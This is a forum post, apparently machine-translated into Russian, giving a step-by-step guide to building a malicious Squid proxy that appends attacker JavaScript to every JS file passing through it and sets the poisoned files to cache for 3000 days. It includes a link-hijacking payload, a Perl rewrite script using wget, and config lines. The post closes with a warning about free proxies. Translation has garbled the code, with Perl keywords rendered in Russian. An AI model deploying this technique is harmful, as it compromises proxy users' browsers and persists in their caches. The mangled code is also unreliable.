Последний раз этот пост был отредактирован Мо Сяовэнь 7.06.2015 23:19
Это можно сделать, просто изменив конфигурацию SQUID
Что такое SQUID?
Squid — это программное обеспечение, которое кэширует интернет-данные, получает запросы на скачивание от пользователей и автоматически обрабатывает загруженные данные. Когда пользователь хочет скачать главную страницу, он может отправить запрос Squid, попросить Squid скачать её от его имени, затем Squid подключается к сайту и запрашивает главную страницу, а затем отправляет главную страницу пользователю, сохраняя резервную копию. Когда другие пользователи подают заявку на ту же страницу, Squid сразу отправляет сохраненную копию, чтобы пользователь почувствовал, что скорость довольно высокая. Squid может прокси протоколы, такие как HTTP, FTP, GOPHER, SSL и WAIS, а Squid может обрабатывать это автоматически, а вы можете настроить Squid в зависимости от своих потребностей для фильтрации нежелательных объектов.
Squid может работать во многих операционных системах, таких как AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 и др.
Реализация очень проста:
1. Установите Squid на одном Linux-сервере.
2. Модифицировать код сервера, вставить часть нашего кода во весь передаваемый javascrip и отправить его.
3. Установите время кэша нашего модифицированного js-файла как можно выше.
Этот метод также применяется к сайтам с включённым SSL: если сайт загружает незащищённый ресурс (например, jquery для HTTP-сайта), большинство браузеров выдают предупреждение, но мало кто обращает на это внимание.
Chema сказал, что более 5 000 человек использовали его прокси через несколько дней после публикации, и большинство людей использовали его для плохих действий, потому что они использовали прокси, поэтому считали его анонимным и безопасным, но никогда не ожидали, что прокси-сервер тоже будет делать плохие вещи.
Создайте свой вредоносный прокси-сервер
Если у вас уже есть прокси-сервер Squid, вам также понадобится веб-сервер, например Apache.
Шаг 1 Создание полезной нагрузки
Я использую простой скрипт как демонстрацию, чтобы указывать все гиперссылки на мой сайт.
/etc/squid/payload.js
[mw_shl_code=javascrip удалить t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Шаг 2: Напишите скрипт для заражения всех JS-файлов
/etc/squid/poison.pl
[mw_shl_code=perl, правда]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
в то время(<>)
{
чомп $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
печать «http://127.0.0.1:80/tmp/$pid-$count.js»;
}
Другое
{
печатать «$_»;
}
$count++;
}[/mw_shl_code]
Этот скрипт использует wget, чтобы получить оригинальный javascrip страницы и удалить t-файл, затем добавить код в /etc/squid/payload.js и отправить изменённый файл клиенту, а вам нужно создать папку /var/www/tmp и разрешить squid записывать в неё файлы. В этом каталоге хранятся изменённые js-файлы.
Шаг 3: Объедините вышеуказанный сценарий с Squid
Добавьте его в /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Шаг 4: Сделайте кэш никогда не сбоем
/var/www/tmp/.htaccess
[mw_shl_code=html, true] ExpiresActive On
ExpiresDefault "доступ плюс 3000 дней"[/mw_shl_code]
Это подскажет Апачу дать ему длительный срок годности, пока пользователь не очистит свой кэш.
Если вы подключите этот прокси, клик по любой гиперссылке перенаправит вас на мой сайт, и кэш останется даже если вы позже не используете прокси. Я просто использовал неагрессивную нагрузку, и с этим методом хакеры могут сделать гораздо больше. Поэтому напоминайте себе и друзьям быть осторожными с использованием бесплатных прокси.
|
Опубликовано 19.01.2015 2:34:56
|
|
|
|
Опубликовано 19.01.2015 8:48:45
|
Хозяин|
Опубликовано 20.01.2015 14:36:06
|
